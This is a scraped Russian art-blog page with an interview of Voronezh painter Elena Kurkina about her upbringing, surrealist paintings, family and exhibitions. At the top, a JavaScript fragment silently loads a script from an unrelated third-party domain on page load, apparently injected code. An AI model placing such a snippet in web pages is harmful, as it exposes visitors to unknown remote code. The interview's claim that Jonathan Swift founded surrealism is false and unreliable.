, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Интервью с художницей Куркиной Еленой

Автор: Дмитрий Алмазов | 28 Июн 2014

Коллаж картинКак вы, дорогие читатели помните, в прошлом своем интервью я задавала вопросы воронежской художнице Людмиле Проскуриной, поразившей нас своими цветочными натюрмортами. Сегодня же, расскажу вам об еще одной интереснейшей встрече, встрече с художницей Еленой Куркиной.

– Мне известно, что вы родом из Магадана. Не могли ли бы вы рассказать небольшую автобиографию о себе?

Собственно, правильно написано, что из Магадана. Я там родилась, но мало помню этот город, потому что практически сразу после рождения переехала в Воронеж и все это время живу здесь.

Рисую с самого раннего детства. Можно сказать, что мои рисунки были непонятны родителям, были ясны только мне одной, но впоследствии начали обретать какую-то форму. В художественную школу пошла для того, чтобы поддержать эту атмосферу.  Она дала мне классические основы рисования, и вся эта творческая атмосфера очень сильно на меня повлияла.

– На сайте в интернете написано, что инициативу отправить вас в художественную школу взял ваш папа. Расскажите об отношении родителей по поводу выбора такого хобби.

Можно сказать, что мама сначала была против. Мои родители разные в этом плане. Папа более творческий человек, этим и похож на меня, ну или я на него (смеется). У папы интересная профессия. Он геолог. Собственно поэтому, мы и жили в Магадане. Папа хотел всегда, чтобы я занималась тем, что мне нравится. Мама же не такой творческий человек, как мы с папой, поэтому я и поступила на экономический факультет. Но я не желаю, потому что мне понравилось работать в сфере рекламы, это тоже творческая работа, где я могу развиваться как художник.

Куркина Елена, картина масломДо возвращения папы из Магадана, когда мне исполнилось 15 лет, мои рисунки стали более четкими. В школе рисовала загадки, ребусы. Папа предложил мне поступить в худ. школу. Мы показали мои рисунки и меня приняли на вечернее отделение. Папа был рад и гордился мной. Мама не принимала сначала рисование за серьезное увлечение, я даже пыталась это бросить. Но как же можно бросать часть себя? Это было и остается моим самовыражением, при чем его нельзя сделать на заказ, оно идет из глубины, из сердца. У меня есть 2 вида работ: обдуманные и неосознанные. Мне иногда на выставке задают вопрос: «Почему эта картина без названия?» Бывает так, что идеи о рисунке исходят из ниоткуда, как будто неведомая рука творит. Иногда просто не замечаю, как проходит время. Могу проснуться и уже в голове есть все детали новой работы.

– Расскажите о времени, проведенном в художественной школе? Остались светлые воспоминания?

Да, конечно. Многие люди приходили найти друзей, кто-то рисовал. Было интересно находиться в таком месте, чувствовать ту атмосферу. Меня интересовала человеческая психология, смотреть на лица, чувствовать эмоции. Это место на меня сильно повлияло.

Были ли в вашей семье художники?

Да. Папа рассказывал о своем давнем дяде, священнике, который очень хорошо писал. Только он писал не иконы, а другие вещи, типа сюрреализма, за что его и отлучили от церкви. Однако картины были популярны и каким-то образом сохранялись долгое время.

– Основное направление ваших работ сюрреалист кое. Его основатель Джонатан Свифт. Основные черты это сочетание парадоксальных и иллюзорных черт. Но есть и живопись. Расскажите об этом.

Да есть живопись. Но в основном под заказ, либо подсознательная живопись. Я считаю, что не полностью еще раскрыла себя в этом направлении, хотя она немного не для меня. Мне интересней показать зрителю что-то необъяснимое в душе.

Картина маслом Остров– Основной термин сюрреалистики - сюрреальность, т.е. сон и реальность. Бывали ли источником вашего вдохновения сны?

Да. Но только это все подсознательно. Зависит от настроения, мыслей. Никогда не знаешь, что придет в голову.

– Все творческие люди талантливы во всем. Занимаетесь ли вы каким-либо еще творчеством помимо художественного?

Да, мне всегда нравилось рукоделие. Рукоделие очень полезное занятие, упорядочивает мысли. Хобби помимо рукоделия – чтение книг. Люблю классическую английскую литературу. Дж. Лондон, Ч. Диккенс, Драйзер, другие. На разном этапе жизни их воспринимаешь по-разному. Каждый раз извлекаешь новые уроки для себя, видишь мир по-другому.

– Такой вот нескромный вопрос. Я знаю что вы замужем. Как в вашей новой семье муж и ребенок относятся к такому занятию? Гордятся ли вами? Поддерживают?

Конечно. Но ребенку передался математический склад ума от мужа, поэтому нет сильной привязанности к рисованию, хотя иногда сын может подойти и сказать о недостатках, например, добавить больше цвета. Дети очень непосредственны в этом. Я стараюсь дать свободу его выбору. Наверное, никогда его не буду загонять в жесткие рамки.

– Как вы успеваете совмещать дом, семью, творчество? Наверное, на что-то не хватает времени.

Как-то получается. Да на что-то приходится тратить времени больше, на что-то меньше. Но я не хочу все время тратить на творчество. Семья никогда не мешает мне творить, даже наоборот. Просто иногда рисование помогает уйти на время от забот и тягот повседневной жизни.

– То есть для вас главная ценность это семья?

Естественно это опора. Возможно, это слишком традиционно, но это важно для меня. Мне хочется именно для них что-то делать.

Дмитрий Алмазов и Елена Куркина– Вот фотографии с вашей выставки в прошлом году. Расскажите о ней. Кто был?

Данная выставка была в «Алор брокер» это брокерская компания в бизнес-центре. Пришли самые близкие. Было немного народу. Наверное, сама крупная выставка.

– А вот эта картина? Сразу привлекла внимание.

Дмитрий подал идею о создании картины к юбилею Муслима Магомаева. Чтобы создать ее прочитала и просмотрела очень много литературы. Должна признать что прониклась глубоким уважением и вниманием. Сейчас из современных звезд мало кто ТАК поет. Вспомните хотя бы его песни «Чертово колесо» или «Море, море».

Картина маслом МуслимНа картине изображены самые важные элементы его жизни. Это его портрет, театр Ласкала, вот Франция. А это его родной город Баку, Муслим в роли Фигаро, кстати он очень хорошо исполнил эту арию. А вот и его любимое море.

– Вы сказали что работаете на заказ. Много ли покупателей? Что обычно просят нарисовать?

Есть различные покупатели. Есть несколько постоянных. Начальная цена чисто символическая. Заказы из России. Был даже заказ из Москвы. Работники фирмы решили подарить генеральному директору его портрет. Обычно это портреты или пейзажи.

– Сейчас проводится ваша совместная выставка с Людмилой Проскуриной с ресторане Медитерра. Она называется «Противостояние».

Очень много ваших абстрактных картин. Мои картины в зале для курящих, ее более легкие и светлые в зале для некурящих. Выставку помог организовать Дмитрий Алмазов.

– Самый важный вопрос. Что вас вдохновляет?

Да все практически. Вся жизнь вокруг, например, вечернее небо. Вдохновение появляется из глубины. Могут вдохновить обычные люди, особенно пожилые. Контрасты, разница между богатыми и бедняками. У людей о многом говорит лицо. Поэтому мне нравится портретный жанр. Кроме этого мне хочется передать ощущение жизни, ее многогранность.

Картина Елены КуркинойКартина Кролик– Стараетесь ли вы развиваться как человек, личность?

Естественно. Хожу в музеи, посещаю исторические места. Читаю, слушаю классическую музыку. Это важно для нашего времени.

– Верите ли вы в судьбу?

Да. Но человек может сам создать себя, мнение о себе у окружающих. Человек сам делает себя. Все зависит от твоего выбора. Каждый сам выбирает себе дорогу.

– Если будет вдохновение, планируете ли вы устроить персональную выставку? И на какую тему?

Да, конечно. Хотелось бы сделать серию картин о нашей жизни, людях, их отношении. Я считаю что это действительно важная тема…

Ну что ж, огромное спасибо художнице Елене Куркиной, рассказавшей нам о своем творческом нелегком труде. Пожелаем ей счастья, здоровья, вдохновения и гармонии!

Автор: Алёхина Дарья

Заказать картины у  Елены Куркиной Вы можете по телефону 8 (960)134-46-27 или написать письмо на странице контакты.

Темы: Арт Воронеж, Новости, Художник | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress